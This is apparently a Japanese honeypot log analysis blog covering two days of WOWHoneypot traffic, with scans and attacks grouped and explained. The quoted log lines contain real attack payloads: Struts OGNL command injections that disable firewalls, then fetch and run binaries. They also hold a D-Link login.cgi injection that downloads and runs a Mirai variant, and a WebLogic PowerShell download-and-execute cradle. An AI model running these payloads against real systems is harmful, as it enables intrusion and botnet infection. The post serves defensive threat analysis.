例によって、phpMyAdmin関係と思われるindex.php、setup.php等や調査と思われる/(ルート)へのアクセス等を除外します。

21 [2018-06-16 "GET /index.action
8 [2018-06-16 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-16 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-16 "GET /login.action
1 [2018-06-16 "GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 [2018-06-16 "GET /index.html
1 [2018-06-16 "GET /index.htm
1 [2018-06-16 "GET /home.do
1 [2018-06-16 "GET /index.do
1 [2018-06-16 "GET /login.do
1 [2018-06-16 "GET /main.do
1 [2018-06-16 "GET /home.jsp
1 [2018-06-16 "GET /index.jsp
1 [2018-06-16 "GET /main.jsp
1 [2018-06-16 "GET hxxp://httpheader[.]net/
1 [2018-06-16 "GET /xxbb
1 [2018-06-16 "GET /ccvv

 見るべきものが多いですが、種類分けして見ていきます。

 1. phpMyAdmin関係

普段ならスルーしていますが、アクセス件数が多いので、軽く見てみます。
まず、index.phpにアクセスしてくるログのサンプルです。

GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Keep-Alive
Cache-Control: no-cache

今回は複数回スキャンされているようで、普段は1-2IPから来ているのが、今回は4IPからスキャンされています。

$ awk '{print $1,$3,$5,$6}' access_log | grep index.php | awk '{print $1,$2}' | sort | uniq -c | sort -nr
84 [2018-06-16 103.82.52.171
81 [2018-06-16 114.116.3.232
51 [2018-06-16 103.233.255.107
49 [2018-06-16 202.53.137.242
84 [2018-06-15 120.24.236.8
34 [2018-06-14 195.216.239.82
62 [2018-06-13 139.199.5.150
49 [2018-06-12 59.63.206.214
20 [2018-06-12 139.196.186.208
82 [2018-06-11 47.90.102.190

setup.phpにアクセスしているは以下になり、ログの出方が違います。IPも別です。

GET /phpMyAdmin/scripts/setup.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: ZmEu
Connection: Close 

 こちらはUser-Agentに出ている通り、ZmEuというスキャンツールを使っています。
このツールを使う時は、以下のアクセスが一番始めに来ます。ZmEuがHelloって言ってるようなものだと思ってます。

GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: ZmEu
Connection: Close

2. Struts関係

いつもアクセスがありますが、本日は特に多い為種類を調べてみます。
ペイロード部分から攻撃っぽい部分を調査すると、以下の6種類のようです。

GET /index.action HTTP/1.1
Content-Type: ......(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hxxp://wap.tfddos[.]net:57843/linux;chmod 777 linux;./linux;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds))......
GET /index.action HTTP/1.1
Content-Type: ......(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hxxp://119.188.247[.]73:5858/88888syzz;chmod 777 88888syzz;./88888syzz;').......
GET /index.action HTTP/1.1
Content-Type: ......(#cmd='echo Open 127.0.0.1 21>C:\Ftp.bat&&echo 123>>C:\Ftp.bat&&echo 123>>C:\Ftp.bat&&echo Binary>>C:\Ftp.bat&&echo Get 1.exe C:\setup.exe>>C:\Ftp.bat&&echo Bye>>C:\Ftp.bat&&echo Ftp.exe -s:C:\Ftp.bat>C:\Ftp.bat&&echo C:\setup.exe>>C:\Ftp.bat&&echo del C:\Ftp.bat>>C:\Ftp.bat&&echo del C:\Ftp.bat>>C:\Ftp.bat&&C:\Ftp.bat')......
GET /index.action HTTP/1.1
Content-Type: ......(#cmd='echo open 107.179.45.135> c:\cmd.txt&echo 110>> c:\cmd.txt&echo 110>> c:\cmd.txt&echo get 1.exe>> c:\cmd.txt&echo bye >> c:\cmd.txt&echo 1.exe>> c:\cmd.txt&ftp -s:c:\cmd.txt&start 1.exe&1.exe&del c:\cmd.txt&exit')......
GET /index.action HTTP/1.1
Content-Type: ......(#cmd='nMaskCustomMuttMoloz')......
GET /login.action HTTP/1.1
Content-Type: ......(#cmd='nMaskCustomMuttMoloz')......

最後の2つは調査行為と思われます。それ以外のアクセスは全て同じIPから攻撃が来ています。

1つ目の取得する不審ファイルは以下のものです。

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'http://wap.tfddos.net:57843/linux'

なお、最後の2つと同じペイロードのアクセスが以下のパスに対して来ていました。

1 [2018-06-16 "GET /index.html
1 [2018-06-16 "GET /index.htm
1 [2018-06-16 "GET /home.do
1 [2018-06-16 "GET /index.do
1 [2018-06-16 "GET /login.do
1 [2018-06-16 "GET /main.do
1 [2018-06-16 "GET /home.jsp
1 [2018-06-16 "GET /index.jsp
1 [2018-06-16 "GET /main.jsp

3.D-Linkの脆弱性を突くMirai亜種

昨日と同様ですが、アクセス数が多くなっています。

8 [2018-06-16 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'r'

4.Weblogic脆弱性を突くアクセス

これまでと同様のものと思われます。

1 [2018-06-16 "POST /wls-wsat/CoordinatorPortType
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://101.200.45[.]78/images/test/DL.php');base64: invalid input

5. プロキシを探すアクセス行為

これまでも何度かあったものと同様と思われます。

GET hxxp://httpheader[.]net/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)
Host: httpheader[.]net
Accept-Encoding: deflate, gzip
Proxy-Connection: Keep-Alive
Accept-Language: en-gb,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Pragma: no-cache
Cache-Control: no-cache

6.脆弱性スキャナーZGrabによるアクセス

アクセスしているパスはどういったものを対象としているかは不明です。

GET /xxbb HTTP/1.1
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip

7.調査行為(詳細不明)

アクセス対象の詳細は不明ですがペイロードに何もないため、パスが存在するかの調査行為と思われます。

GET /ccvv HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64)
Accept-Encoding: gzip

 

本日のハンティングログは以下です。

$ awk '/06-16/{print $1,substr($0,index($0,$4))}' /var/log/wowhoneypot/hunting.log | sort | uniq -c | sort -nr
8 [2018-06-16 wget hxxp://185.62.190[.]191/r
5 [2018-06-16 wget -c hxxp://wap.tfddos[.]net:57843/linux
5 [2018-06-16 wget -c hxxp://119.188.247[.]73:5858/88888syzz

D-Linkの脆弱性をもらったMirai亜種とStruts脆弱性を狙ったものです。

以上です。

WOWHonypot簡易分析(12日目)

WOWhonypotの2018/6/15(金)(運用12日目)の簡易分析です。

アクセス件数は272件です。

$ awk '/06-15/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr
120 [2018-06-15 "GET /
65 [2018-06-15 "HEAD /
3 [2018-06-15 "GET /phpMyAdmin/phpMyAdmin/index.php
3 [2018-06-15 "GET /phpmyadmin/phpmyadmin/index.php
3 [2018-06-15 "GET /phpma/index.php
2 [2018-06-15 "GET /xampp/phpmyadmin/index.php
2 [2018-06-15 "GET /www/phpMyAdmin/index.php
2 [2018-06-15 "GET /web/phpMyAdmin/index.php
2 [2018-06-15 "GET /typo3/phpmyadmin/index.php
2 [2018-06-15 "GET /tools/phpMyAdmin/index.php
2 [2018-06-15 "GET /pmd/index.php
2 [2018-06-15 "GET /pma-old/index.php
2 [2018-06-15 "GET /pmamy/index.php
2 [2018-06-15 "GET /pmamy2/index.php
2 [2018-06-15 "GET /PMA/index.php
2 [2018-06-15 "GET /pma/index.php
2 [2018-06-15 "GET /PMA2/index.php
2 [2018-06-15 "GET /phpMyAdminold/index.php
2 [2018-06-15 "GET /phpMyAdmin.old/index.php
2 [2018-06-15 "GET /phpmyadmin-old/index.php
2 [2018-06-15 "GET /phpMyAdmin/index.php
2 [2018-06-15 "GET /phpmyadmin/index.php
2 [2018-06-15 "GET /phpMyadmin_bak/index.php
2 [2018-06-15 "GET /phpmyadmin2/index.php
2 [2018-06-15 "GET /phpmyadmin1/index.php
2 [2018-06-15 "GET /phpmyadmin0/index.php
2 [2018-06-15 "GET /phpadmin/index.php
2 [2018-06-15 "GET /mysql/index.php
2 [2018-06-15 "GET /mysqladmin/index.php
2 [2018-06-15 "GET /mysql-admin/index.php
2 [2018-06-15 "GET /myadmin/index.php
2 [2018-06-15 "GET /myadmin2/index.php
2 [2018-06-15 "GET /index.php
2 [2018-06-15 "GET /db/index.php
2 [2018-06-15 "GET /dbadmin/index.php
2 [2018-06-15 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-15 "GET /admin/PMA/index.php
2 [2018-06-15 "GET /admin/pma/index.php
2 [2018-06-15 "GET /admin/phpMyAdmin/index.php
2 [2018-06-15 "GET /admin/phpmyadmin/index.php
2 [2018-06-15 "GET /admin/phpmyadmin2/index.php
2 [2018-06-15 "GET /admin/mysql/index.php
2 [2018-06-15 "GET /admin/mysql2/index.php
2 [2018-06-15 "GET /admin/index.php
1 [2018-06-15 "PROPFIND /
1 [2018-06-15 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-15 "GET /photo/webapi/album.php
1 [2018-06-15 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-15 "GET /console/login/LoginForm.jsp

いつも通りphpmyadmin関連と思われるindex.phpを省きます。

$ awk '/06-15/{print $1,$5,$6}' access_log | sort | uniq -c | sort -nr | grep -v index.php
120 [2018-06-15 "GET /
65 [2018-06-15 "HEAD /
1 [2018-06-15 "PROPFIND /
1 [2018-06-15 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-15 "GET /photo/webapi/album.php
1 [2018-06-15 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-15 "GET /console/login/LoginForm.jsp

見るべき数は4つに減りました。

1.まずはいつものWeblogic脆弱性(/wls-wsat/)を突くものを見ます。

$ awk '/06-15/{print $1,$5,$6,$10}' access_log | grep wls | awk '{print $4}' | base64 -d | grep -o 'Hidden.*' | awk '{pr
int $3}' | base64 -d
$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://101.200.45[.]78/images/test/DL.php');

アクセス先が'hxxp://120.25.148[.]202/images/test/DL.phpからhxxp://101.200.45[.]78/images/test/DL.phpに変わりましたが、それ以外は同じです。

2.次はphotoのパスのものです。

$ awk '/06-15/{print $1,$5,$6,$10}' access_log | grep photo | awk '{print $4}' | base64 -d
GET /photo/webapi/album.php HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Referer: hxxp://(wow-ip):80/photo/webapi/album.php

このパスはSynology社の Photo Station というアプリケーションのようです。
このアプリケーションに関する脆弱性が2018/5/18にJVDが公開されています。

JVNDB-2017-013004 - JVN iPedia - 脆弱性対策情報データベース

企業のサイトでは1月に任意のコード実行として脆弱性が出ています。

Synology-SA-18:02 Photo Station | Synology Inc.

攻撃的なペイロードが来ていないため、存在確認の調査行為と思われます。

3.LoginFormのパスに来ているものです。

$ awk '/06-15/{print $1,$5,$6,$10}' /var/log/wowhoneypot/access_log | grep Form | awk '{print $4}' | base64 -d
GET /console/login/LoginForm.jsp HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Referer: hxxp://(wow-ip):80/console/login/LoginForm.jsp

このパスはWebgicの管理コンソールのログイン画面です。デフォルトでは7001番ポートで空いています。
アクセス内容は普通ですので、このパスが外部に公開されているかを調査しているものと思われます。

4.最後にwgetしているものを見ます。

$ awk '/06-15/{print $1,$5,$6,$10}' /var/log/wowhoneypot/access_log | grep wget | awk '{print $4}' | base64 -d

GET /login.cgi?cli=aa aa';wget hxxp://185.62.190[.]191/r -O -> /tmp/r;sh /tmp/r'$ HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World

パスはD-Linkの脆弱性に関するもののようです。
 rというファイルを取得して実行するようです。hashを調べるとLinux/Miraiと判定されます。
https://www.virustotal.com/#/url/cc060376ec00e56abb028826d4ecdfd334c994ab04f353a05faf7b823be84ef7/detection
https://www.virustotal.com/#/file/7caac9c9fa954730665d63b692119ba5f14ee6c07cf11ffc60bca7b3d25ea109/deptection
https://www.hybrid-analysis.com/sample/b8ede54719f9b5bb55dce76a1acd5adbc9a56b8e5950a3d3fc038fc9d42e2da0/5b24f6677ca3e11b1a1b321b

最近注意喚起のあった80番ポートに対するMirai亜種というものかも知れません。

http://www.npa.go.jp/cyberpolice/detect/pdf/20180613.pdf

 

ハンティングログは以下で、先程のものです。

[2018-06-15 hxxp://185.62.190[.]191/r

以上です。